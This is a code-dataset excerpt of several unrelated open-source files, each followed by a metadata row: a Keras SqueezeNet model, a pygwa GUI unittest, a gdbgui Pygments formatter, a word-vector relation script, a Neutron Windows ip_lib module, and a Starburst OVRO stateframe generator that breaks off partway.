		print 'Arguments parser error, try -h: ' + str(err)
finally:
outputFile.close()
print 'Done. Output file generated "output_got.csv".'
if __name__ == '__main__':
main(sys.argv[1:]) | mit | 3,090,110,719,284,948,000 | 30.848101 | 194 | 0.656859 | false | 2.962309 | false | false | false |
GoogleCloudPlatform/keras-idiomatic-programmer | zoo/squeezenet/squeezenet_complex.py | 1 | 4023 | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# SqueezeNet v1.0 with complex bypass (i.e., transition convolution on identify link) (2016)
# Paper: https://arxiv.org/pdf/1602.07360.pdf
import tensorflow as tf
from tensorflow.keras import Input, Model
from tensorflow.keras.layers import Conv2D, MaxPooling2D, Concatenate, Add, Dropout
from tensorflow.keras.layers import GlobalAveragePooling2D, Activation
def stem(inputs):
''' Construct the Stem Group
inputs : input tensor
'''
x = Conv2D(96, (7, 7), strides=2, padding='same', activation='relu',
kernel_initializer='glorot_uniform')(inputs)
x = MaxPooling2D(3, strides=2)(x)
return x
def learner(x):
''' Construct the Learner
x : input to the learner
'''
# First Fire group, progressively increase number of filters
x = group(x, [16, 16, 32])
# Second Fire group
x = group(x, [32, 48, 48, 64])
# Last Fire block
x = fire_block(x, 64)
# Dropout is delayed to end of fire modules
x = Dropout(0.5)(x)
return x
def group(x, filters):
''' Construct a Fire Group
x : input to the group
filters: list of number of filters per block in group
'''
for n_filters in filters:
x = fire_block(x, n_filters)
# Delayed downsampling
x = MaxPooling2D((3, 3), strides=2)(x)
return x
def fire_block(x, n_filters):
''' Construct a Fire Block with complex bypass
x : input to the block
n_filters: number of filters in block
'''
# remember the input (identity)
shortcut = x
# if the number of input filters does not equal the number of output filters, then use
# a transition convolution to match the number of filters in identify link to output
if shortcut.shape[3] != 8 * n_filters:
shortcut = Conv2D(n_filters * 8, (1, 1), strides=1, activation='relu',
padding='same', kernel_initializer='glorot_uniform')(shortcut)
# squeeze layer
squeeze = Conv2D(n_filters, (1, 1), strides=1, activation='relu',
padding='same', kernel_initializer='glorot_uniform')(x)
# branch the squeeze layer into a 1x1 and 3x3 convolution and double the number
# of filters
expand1x1 = Conv2D(n_filters * 4, (1, 1), strides=1, activation='relu',
padding='same', kernel_initializer='glorot_uniform')(squeeze)
expand3x3 = Conv2D(n_filters * 4, (3, 3), strides=1, activation='relu',
padding='same', kernel_initializer='glorot_uniform')(squeeze)
# concatenate the feature maps from the 1x1 and 3x3 branches
x = Concatenate()([expand1x1, expand3x3])
# if identity link, add (matrix addition) input filters to output filters
if shortcut is not None:
x = Add()([x, shortcut])
return x
def classifier(x, n_classes):
''' Construct the Classifier
x : input to the classifier
n_classes: number of output classes
'''
# set the number of filters equal to number of classes
x = Conv2D(n_classes, (1, 1), strides=1, activation='relu', padding='same',
kernel_initializer='glorot_uniform')(x)
# reduce each filter (class) to a single value
x = GlobalAveragePooling2D()(x)
x = Activation('softmax')(x)
return x
# The input shape
inputs = Input((224, 224, 3))
# The Stem Group
x = stem(inputs)
# The Learner
x = learner(x)
# The Classifier
outputs = classifier(x, 1000)
model = Model(inputs, outputs)
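# Optional sanity check (not part of the original paper code): print the
# layer-by-layer summary of the assembled SqueezeNet model.
model.summary()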
| apache-2.0 | 1,582,759,778,911,955,200 | 32.525 | 92 | 0.661695 | false | 3.660601 | false | false | false |
cdd1969/pygwa | tests/test_01.py | 1 | 4619 | from __future__ import print_function
import sys
import os
# hack our sys argv path to match BASEDIRECTORY
sys.argv[0] = os.path.abspath(os.path.join(os.path.dirname(sys.argv[0]), os.pardir, 'pygwa.py'))
import unittest
from PyQt5 import QtGui, QtCore
from PyQt5.QtTest import QTest
from PyQt5.QtCore import Qt
import numpy as np
import matplotlib.pyplot as plt
from lib.mainWindow import MainWindow
from lib import projectPath
"""
to run this test
$ git clone https://github.com/cdd1969/pygwa.git pygwa
$ cd pygwa
$ python -m tests.test_01 -v
"""
app = QtGui.QApplication(sys.argv)
plt.ion() #enable matplotlib interactive mode
if '-v' in sys.argv:
log = True
else:
log = False
class FlowchartNodesTest(unittest.TestCase):
'''Test different nodes in PyGWA GUI'''
def setUp(self):
'''Create the GUI'''
self.form = MainWindow()
self.form._unittestmode = True
self.fc = self.form.fc
self.nodeTypes = self.form.uiData.fclib().getNodeList()
def tearDown(self):
plt.close('all')
self.form.close()
del self.form
if log: print('')
def readXLS(self, path=None):
''' Read XLS and return the node'''
if path is None:
# now set test_data file
path = projectPath('../TUTORIALS/test_data.xlsx')
n = self.fc.createNode('readXLS', pos=(0, 0))
p = n.ctrlWidget().param #alias to method
p('Select File').setValue(path)
#set some params...
p('Parameters', 'skiprows').setValue(0)
p('Parameters', 'skip_footer').setValue(0)
p('Parameters', 'na_values').setValue(u'---')
#load data
p('Load File').activate()
return n
def test_01_init(self):
'''Test the GUI in its default state by initializing it'''
print ('sys.argv = ', sys.argv)
def test_02_add_nodes(self):
        ''' Test GUI by adding a number of nodes'''
for nodeType in self.nodeTypes:
if log: print ('\tadding node `{0}`...'.format(nodeType), end='')
self.fc.createNode(nodeType, pos=(0, 0))
if log: print ('ok')
def test_03_node_readXLS(self):
''' Add Node `readXLS`, load data'''
self.readXLS()
def test_04_node_QuickView(self):
''' Connect node QuickView to readXLS and view data'''
readXLS = self.readXLS()
QuickView = self.fc.createNode('QuickView', pos=(0, 0))
self.fc.connectTerminals(readXLS['output'], QuickView['In'])
QTest.mouseClick(QuickView.ctrlWidget().pushButton_viewTable, Qt.LeftButton)
#QuickView.ctrlWidget().twWindow.close()
QTest.mouseClick(QuickView.ctrlWidget().pushButton_viewPlot, Qt.LeftButton)
def test_05_node_TimeseriesPlot(self):
''' Load data, create two curves with node `makeTimeseriesCurve` and plot them with node `TimeseriesPlot`'''
readXLS = self.readXLS()
curve1 = self.fc.createNode('makeTimeseriesCurve', pos=(0, 0))
curve2 = self.fc.createNode('makeTimeseriesCurve', pos=(0, 0))
plotNode = self.fc.createNode('TimeseriesPlot', pos=(0, 0))
self.fc.connectTerminals(readXLS['output'], curve1['df'])
self.fc.connectTerminals(readXLS['output'], curve2['df'])
curve1.ctrlWidget().p.param('Y:signal').setValue(u'River')
curve1.ctrlWidget().p.param('tz correct').setValue(1.2)
self.fc.connectTerminals(curve1['Curve'], plotNode['Curves'])
self.fc.connectTerminals(curve2['Curve'], plotNode['Curves'])
plotNode.ctrlWidget().p.param('Y:Label').setValue('test label')
plotNode.ctrlWidget().p.param('Y:Units').setValue('test units')
plotNode.ctrlWidget().p.param('Crosshair').setValue(True)
plotNode.ctrlWidget().p.param('Data Points').setValue(True)
plotNode.ctrlWidget().p.param('Plot').activate()
def test_06_node_StatisticalAnalysis(self):
''' Load data, perform stat analysis'''
readXLS = self.readXLS()
statAnalysis = self.fc.createNode('Plot Histogram', pos=(0, 0))
self.fc.connectTerminals(readXLS['output'], statAnalysis['In'])
statAnalysis.ctrlWidget().p.param('Signal').setValue('GW_2')
statAnalysis.ctrlWidget().p.param('Signal Units').setValue('test units')
statAnalysis.ctrlWidget().p.param('Histogram Type').setValue('Normalized')
statAnalysis.ctrlWidget().p.param('Bins').setValue(15)
statAnalysis.ctrlWidget().p.param('Plot').activate()
if __name__ == "__main__":
unittest.main()
| gpl-2.0 | -1,722,578,703,316,824,800 | 32.715328 | 116 | 0.628708 | false | 3.564043 | true | false | false |
cs01/gdbgui | gdbgui/htmllistformatter.py | 1 | 1363 | from pygments.formatters import HtmlFormatter # type: ignore
class HtmlListFormatter(HtmlFormatter):
"""A custom pygments class to format html. Returns a list of source code.
Each element of the list corresponds to a line of (marked up) source code.
"""
def get_marked_up_list(self, tokensource):
"""an updated version of pygments.formatter.format_unencoded"""
source = self._format_lines(tokensource)
if self.hl_lines:
source = self._highlight_lines(source)
if not self.nowrap:
if self.linenos == 2:
source = self._wrap_inlinelinenos(source)
if self.lineanchors:
source = self._wrap_lineanchors(source)
if self.linespans:
source = self._wrap_linespans(source)
if self.linenos == 1:
source = self._wrap_tablelinenos(source)
# instead of this:
# for t, piece in source:
# outfile.write(piece)
# evaluate the generator to a list of just source code:
IS_CODE_INDEX = 0
HTML_VALUE_INDEX = 1
IS_CODE_VAL = 1
source_list = [
html_line[HTML_VALUE_INDEX]
for html_line in self._wrap_div(self._wrap_pre(source))
if html_line[IS_CODE_INDEX] == IS_CODE_VAL
]
return source_list
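# Hedged usage sketch (illustrative only): feed a Pygments token stream into the
# formatter and print each marked-up source line. The lexer choice and sample
# code below are arbitrary; gdbgui itself wires this up elsewhere.
if __name__ == "__main__":
    from pygments import lex  # type: ignore
    from pygments.lexers import PythonLexer  # type: ignore
    formatter = HtmlListFormatter()
    for html_line in formatter.get_marked_up_list(lex("print('hi')\n", PythonLexer())):
        print(html_line)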
| gpl-3.0 | 7,960,633,443,017,061,000 | 37.942857 | 78 | 0.589875 | false | 4.020649 | false | false | false |
spyysalo/wvlib | relation.py | 1 | 1579 | #!/usr/bin/env python
"""Given phrases p1 and p2, find nearest neighbors to both and rank
pairs of neighbors by similarity to vec(p2)-vec(p1) in given word
representation.
The basic idea is a straightforward combination of nearest neighbors
and analogy as in word2vec (https://code.google.com/p/word2vec/).
"""
import sys
import os
import numpy
import wvlib
from common import process_args, query_loop
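# Hedged usage note (not from the original repo docs): the exact command-line
# options are defined in common.process_args; a typical run loads a word-vector
# file and then reads two phrases per query from standard input, e.g.
#   python relation.py vectors.bin
# The top pairs of neighbors are ranked by similarity to vec(p2) - vec(p1).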
def process_query(wv, query, options=None):
vectors = [wv.words_to_vector(q) for q in query]
words = [w for q in query for w in q]
nncount = 100 # TODO: add CLI parameter
nearest = [wv.nearest(v, n=nncount, exclude=words) for v in vectors]
nearest = [[(n[0], n[1], wv[n[0]]) for n in l] for l in nearest]
assert len(nearest) == 2, 'internal error'
pairs = [(n1, n2,
numpy.dot(wvlib.unit_vector(vectors[1]-vectors[0]+n1[2]), n2[2]))
for n1 in nearest[0] for n2 in nearest[1] if n1[0] != n2[0]]
pairs.sort(lambda a, b: cmp(b[2], a[2]))
nncount = options.number if options else 10
for p in pairs[:nncount]:
print '%s\t---\t%s\t%f' % (p[0][0], p[1][0], p[2])
return True
def main(argv=None):
if argv is None:
argv = sys.argv
options = process_args(argv[1:])
try:
wv = wvlib.load(options.vectors, max_rank=options.max_rank)
wv = wv.normalize()
except Exception, e:
print >> sys.stderr, 'Error: %s' % str(e)
return 1
return query_loop(wv, options, process_query, query_count=2)
if __name__ == '__main__':
sys.exit(main(sys.argv))
| bsd-3-clause | -3,324,974,838,855,572,500 | 31.22449 | 79 | 0.628879 | false | 2.996205 | false | false | false |
mahak/neutron | neutron/agent/windows/ip_lib.py | 2 | 2559 | # Copyright 2016 Cloudbase Solutions.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import netifaces
from oslo_log import log as logging
LOG = logging.getLogger(__name__)
class IPWrapper(object):
def get_device_by_ip(self, ip):
if not ip:
return
for device in self.get_devices():
if device.device_has_ip(ip):
return device
def get_devices(self):
try:
return [IPDevice(iface) for iface in netifaces.interfaces()]
except (OSError, MemoryError):
LOG.error("Failed to get network interfaces.")
return []
class IPDevice(object):
def __init__(self, name):
self.name = name
self.link = IPLink(self)
def read_ifaddresses(self):
try:
device_addresses = netifaces.ifaddresses(self.name)
except ValueError:
LOG.error("The device does not exist on the system: %s.",
self.name)
return
except OSError:
LOG.error("Failed to get interface addresses: %s.",
self.name)
return
return device_addresses
def device_has_ip(self, ip):
device_addresses = self.read_ifaddresses()
if device_addresses is None:
return False
addresses = [ip_addr['addr'] for ip_addr in
device_addresses.get(netifaces.AF_INET, []) +
device_addresses.get(netifaces.AF_INET6, [])]
return ip in addresses
class IPLink(object):
def __init__(self, parent):
self._parent = parent
@property
def address(self):
device_addresses = self._parent.read_ifaddresses()
if device_addresses is None:
return False
return [eth_addr['addr'] for eth_addr in
device_addresses.get(netifaces.AF_LINK, [])]
def add_namespace_to_cmd(cmd, namespace=None):
"""Add an optional namespace to the command."""
return cmd
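# Hedged usage sketch (illustrative address): look up which local device owns a
# given IP and read its link-layer (MAC) addresses. Not part of the Neutron API.
if __name__ == '__main__':
    _device = IPWrapper().get_device_by_ip('127.0.0.1')
    if _device is not None:
        print(_device.name, _device.link.address)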
| apache-2.0 | -109,766,519,154,845,980 | 28.079545 | 78 | 0.608832 | false | 4.167752 | false | false | false |
lokokung/Starburst-LabJack-OVRO | gen/gen_starburst_sf.py | 1 | 27052 | """
STARBURST OVRO Item Struct Decomposition
(Based on gen_schedule_sf.py)
Author: Lokbondo Kung
Email: [email protected]
"""
import struct
import numpy as np
import shutil
# NUMBER OF ELEMENTS IN CLUSTERS:
Nelements = 7
Nelements_starburst = 4
Nelements_lonoise = 12
Nelements_antenna = 24
# Version # for Subarray2 stateframe and for
# Starburst-specific stateframe - MUST BE DEFINED HERE
version = 3 # Version Date: 3/31/15
starburst_version = 1 # Version Date: 3/7/15
version_date = '3.31.15' # Most recent update (used to write backup file)
"""
Method: gen_starburst_sf()
Description:
    Writes the Starburst OVRO stateframe items from the stateframe
    dictionary. Optionally creates the corresponding XML file. Regardless
    of whether the XML file is created, the path to the XML file is
    returned (tmp/schedule2_stateframe.xml).
    Even if supplied an empty dictionary, this routine will return
    something sensible.
Arguments:
    sf_dict: stateframe dictionary.
    mk_xml: if True, also (re)generate the XML description file.
Returns:
    fmt: format string.
    buf: binary data buffer.
    xmlFile: xml file path.
"""
def gen_starburst_sf(sf_dict, mk_xml=False):
# Set up file name, format string, and buffer.
xmlFile = r'tmp/schedule2_stateframe.xml'
fmt = '<'
buf = ''
xml = None
# Append XML for data cluster
if mk_xml:
xml = open(xmlFile, "w")
xml.write('<Cluster>\n')
xml.write('<Name>Dat2</Name>\n')
xml.write('<NumElts>' + str(Nelements) + '</NumElts>\n')
# ======================================================================
# Start of data dump.
# ======================================================================
append_fmt, append_buf = __general_stateframe(sf_dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# ======================================================================
# Start of Starburst cluster dump.
# ======================================================================
append_fmt, append_buf = __starburst_stateframe(sf_dict, xml, mk_xml)
fmt += append_fmt
buf += append_buf
# Append for end of data cluster
if mk_xml:
xml.write('</Cluster>\n')
xml.close()
# Make backup copy of XML file
backup_file = ('starburst/schedule2_stateframe_v' +
str(version) + '_' + version_date + '.xml')
shutil.copyfile(xmlFile, backup_file)
# Print size of buf
print 'schedule2 size =', len(buf)
print 'Modify acc.ini to reflect this if this is a change in size'
return fmt, buf, xmlFile
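# Hedged usage sketch (illustrative values): how a caller might pack a
# stateframe. The helper below is documentation only and is never invoked
# anywhere in this module.
def _example_gen_starburst_sf_usage():
    sf_dict = {'timestamp': 0.0, 'scan_state': 0}  # hypothetical stateframe dict
    fmt, buf, xml_file = gen_starburst_sf(sf_dict, mk_xml=False)
    # len(buf) is expected to equal struct.calcsize(fmt), since '<' disables padding
    return fmt, buf, xml_file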
def __generic_labjack(dict, xml, mk_xml):
# Initialize
fmt = ""
buf = ""
# DEFAULTS - Generic LabJacks:
default_serial = 0
default_name = ""
default_volts = 0
default_temp = 0
#----------------------------------------------------------------------
# Name of LabJack (length 49 array of characters)
# ----------------------------------------------------------------------
# Define array dimensions
fmt += 'I'
buf += struct.pack('I', 49)
item = dict.get("NAME", default_name)
# Pack name as string of characters
fmt += '49s'
buf += struct.pack("49s", item)
# Append to XML file
if mk_xml:
xml.write('<Array>\n')
xml.write('<Name>Name</Name>\n')
xml.write('<Dimsize>49</Dimsize>\n')
xml.write('<U8>\n')
xml.write('<Name></Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U8>\n')
xml.write('</Array>\n')
#----------------------------------------------------------------------
# Serial Number of LabJack (unsinged int)
# ----------------------------------------------------------------------
# Pack serial number as unsigned int
item = dict.get("SERIAL", default_serial)
fmt += 'I'
buf += struct.pack("I", item)
# Append to XML file
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>SerialNumber</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U32>\n')
#----------------------------------------------------------------------
# 24 Volt input of LabJack in volts (float)
# ----------------------------------------------------------------------
# Pack voltage as float
item = dict.get("POW_24V", default_volts)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Voltage.24v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# 15 Volt input of LabJack in volts (float)
# ----------------------------------------------------------------------
# Pack voltage as float
item = dict.get("POW_15V", default_volts)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Voltage.15v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# 12 Volt input of LabJack in volts (float)
# ----------------------------------------------------------------------
# Pack voltage as float
item = dict.get("POW_12V", default_volts)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Voltage.12v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# 5 Volt input of LabJack in volts (float)
# ----------------------------------------------------------------------
# Pack voltage as float
item = dict.get("POW_5V", default_volts)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Voltage.5v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# -5 Volt input of LabJack in volts (float)
# ----------------------------------------------------------------------
# Pack voltage as float
item = dict.get("POW_N5V", default_volts)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Voltage.Neg5v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# 5 Volt (switched) input of LabJack in volts (float)
# ----------------------------------------------------------------------
# Pack voltage as float
item = dict.get("POW_S5V", default_volts)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Voltage.Switched5v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Temperature of the LabJack in Kelvin (float)
# ----------------------------------------------------------------------
# Pack temperature as float
item = dict.get("LJTEMP", default_temp)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Temp.labjack</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Temperature of the Air Around LabJack in Kelvin (float)
# ----------------------------------------------------------------------
# Pack temperature as float
item = dict.get("LJAIRTEMP", default_temp)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Temp.air</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
return fmt, buf
def __lonoise_labjack(dict, xml, mk_xml):
# Initialize
fmt = ""
buf = ""
    # DEFAULTS - LO/Noise module LabJack:
default_status = 0
default_freq = ("", 0)
#----------------------------------------------------------------------
# Status of Noise Source: 0 = off, 1 = on (unsigned int)
# ----------------------------------------------------------------------
    # Pack status as unsigned int
item = dict.get("NSSTAT", default_status)
try:
item = int(item)
except ValueError:
item = 0
fmt += 'I'
buf += struct.pack('I', item)
# Append to XML file
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>NoiseSourceStatus</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U32>\n')
#----------------------------------------------------------------------
# LO Frequency: 0 = 3.4GHz, 1 = 7.5GHz,
# 2 = 11.5GHz, 3 = 15.5GHz (unsigned int)
# ----------------------------------------------------------------------
    # Pack frequency as unsigned int
item = dict.get("LOFREQ", default_freq)
try:
item = int(item[1])
except ValueError:
item = 0
fmt += 'I'
buf += struct.pack('I', item)
# Append to XML file
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>LOFrequency</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U32>\n')
return fmt, buf
def __antenna_labjack(dict, xml, mk_xml):
# Initialize
fmt = ""
buf = ""
    # DEFAULTS - Antenna (DCM) LabJack:
default_pow = 0
default_atten = 31.5
default_temp = 0
default_vsel = 0
default_hsel = 0
#----------------------------------------------------------------------
# Power to VQ component in dBm (float)
# ----------------------------------------------------------------------
# Pack power as float
item = dict.get("VQPOW", default_pow)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Power.vq</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Power to VI component in dBm (float)
# ----------------------------------------------------------------------
# Pack power as float
item = dict.get("VIPOW", default_pow)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Power.vi</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Power to HQ component in dBm (float)
# ----------------------------------------------------------------------
# Pack power as float
item = dict.get("HQPOW", default_pow)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Power.hq</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Power to HI component in dBm (float)
# ----------------------------------------------------------------------
# Pack power as float
item = dict.get("HIPOW", default_pow)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Power.hi</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Temperature of VQ component in Celsius (float)
# ----------------------------------------------------------------------
# Pack temperature as float
item = dict.get("VQTEMP", default_temp)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Temp.vq</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Temperature of VI component in Celsius (float)
# ----------------------------------------------------------------------
# Pack temperature as float
item = dict.get("VITEMP", default_temp)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Temp.vi</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Temperature of HQ component in Celsius (float)
# ----------------------------------------------------------------------
# Pack temperature as float
item = dict.get("HQTEMP", default_temp)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Temp.hq</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Temperature of HI component in Celsius (float)
# ----------------------------------------------------------------------
# Pack temperature as float
item = dict.get("HITEMP", default_temp)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'f'
buf += struct.pack('f', item)
# Append to XML file
if mk_xml:
xml.write('<SGL>\n')
xml.write('<Name>Temp.hi</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</SGL>\n')
#----------------------------------------------------------------------
# Attenuation setting for VQ component in dB (double)
# ----------------------------------------------------------------------
# Pack attenuation as double
item = dict.get("VQATTEN", default_atten)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'd'
buf += struct.pack('d', item)
# Append to XML file
if mk_xml:
xml.write('<DBL>\n')
xml.write('<Name>Attenuation.vq</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</DBL>\n')
#----------------------------------------------------------------------
# Attenuation setting for VI component in dB (double)
# ----------------------------------------------------------------------
# Pack attenuation as double
item = dict.get("VIATTEN", default_atten)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'd'
buf += struct.pack('d', item)
# Append to XML file
if mk_xml:
xml.write('<DBL>\n')
xml.write('<Name>Attenuation.vi</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</DBL>\n')
#----------------------------------------------------------------------
# Attenuation setting for HQ component in dB (double)
# ----------------------------------------------------------------------
# Pack attenuation as double
item = dict.get("HQATTEN", default_atten)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'd'
buf += struct.pack('d', item)
# Append to XML file
if mk_xml:
xml.write('<DBL>\n')
xml.write('<Name>Attenuation.hq</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</DBL>\n')
#----------------------------------------------------------------------
# Attenuation setting for HI component in dB (double)
# ----------------------------------------------------------------------
# Pack attenuation as double
item = dict.get("HIATTEN", default_atten)
try:
item = float(item)
except ValueError:
item = 0.0
fmt += 'd'
buf += struct.pack('d', item)
# Append to XML file
if mk_xml:
xml.write('<DBL>\n')
xml.write('<Name>Attenuation.hi</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</DBL>\n')
#----------------------------------------------------------------------
# Source Selection for Vertical Polarization:
# 0 = antenna, 1 = noise source (unsigned int)
# ----------------------------------------------------------------------
# Pack selection as unsigned int
item = dict.get("VNSSEL", default_vsel)
try:
item = int(item)
except ValueError:
item = 0
fmt += 'I'
buf += struct.pack('I', item)
# Append to XML file
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>SourceSelection.v</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U32>\n')
#----------------------------------------------------------------------
# Source Selection for Horizontal Polarization:
# 0 = antenna, 1 = noise source (unsigned int)
# ----------------------------------------------------------------------
# Pack selection as unsigned int
item = dict.get("HNSSEL", default_hsel)
try:
item = int(item)
except ValueError:
item = 0
fmt += 'I'
buf += struct.pack('I', item)
# Append to XML file
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>SourceSelection.h</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U32>\n')
return fmt, buf
# Copied from gen_schedule_sf
def __general_stateframe(sf_dict, xml, mk_xml):
# Initialize
fmt = ""
buf = ""
# DEFAULTS - General
default_tstamp = 0.0
default_scan_state = 0
default_phase_tracking = 0
default_uvw = np.array([[0.0,0.0,0.0]]*16)
default_delay = np.zeros(16)
default_az = np.zeros(15)
default_el = np.zeros(15)
default_chi = np.zeros(15)
default_track_flag = np.array([False]*16)
# 1 - Schedule_Timestamp (double) [s, in LabVIEW format]
# To be compatible with other timestamps in the stateframe, this
# will be in LabVIEW format, which is s since 1904/01/01 (don't ask).
# It is the time (should be exact second, no microseconds) for
# which the UVW coordinates and Delays are calculated.
item = sf_dict.get('timestamp',default_tstamp)
fmt += 'd'
buf += struct.pack('d',item)
if mk_xml:
xml.write('<DBL>\n')
xml.write('<Name>Timestamp</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</DBL>\n')
# 2 - Schedule version (double) [N/A]
# Version of the schedule2 stateframe.
item = version
fmt += 'd'
buf += struct.pack('d',item)
if mk_xml:
xml.write('<DBL>\n')
xml.write('<Name>Version</Name>\n')
xml.write('<Val>'+str(item)+'</Val>\n')
xml.write('</DBL>\n')
# 3 - Scan_State (unsigned integer bool)
# Flag (=1 to indicate that DPP should be recording data, =0 otherwise)
item = sf_dict.get('scan_state',default_scan_state)
fmt += 'i'
buf += struct.pack('i',item)
if mk_xml:
xml.write('<I32>\n')
xml.write('<Name>ScanState</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</I32>\n')
# 4 - Phase_Tracking (unsigned integer bool)
# Flag (=1 to indicate that uvw coordinates are valid, =0 otherwise)
item = sf_dict.get('phase_tracking',default_phase_tracking)
fmt += 'I'
buf += struct.pack('I',item)
if mk_xml:
xml.write('<U32>\n')
xml.write('<Name>PhaseTracking</Name>\n')
xml.write('<Val></Val>\n')
xml.write('</U32>\n')
# 5 - UVW (3 x 16 array of doubles) [ns]
# u, v, w coordinates for each antenna, relative to antenna 1.
# Default is array of zeros (=> not tracking phase center)
item = sf_dict.get('uvw',default_uvw)
# Write dimensions into data stream
fmt += 'II'
buf += struct.pack('II',3,16)
fmt += str(3*16)+'d'
for i in range(16):
buf += struct.pack('3d',item[i,0],item[i,1],item[i,2])
if mk_xml:
xml.write('<Array>\n')
xml.write('<Name>UVW</Name>\n')
xml.write('<Dimsize>3</Dimsize><Dimsize>16</Dimsize>\n<DBL>\n<Name></Name>\n<Val></Val>\n</DBL>\n')
xml.write('</Array>\n')
# 6 - Delay (length 16 x 2 array of doubles) [ns]
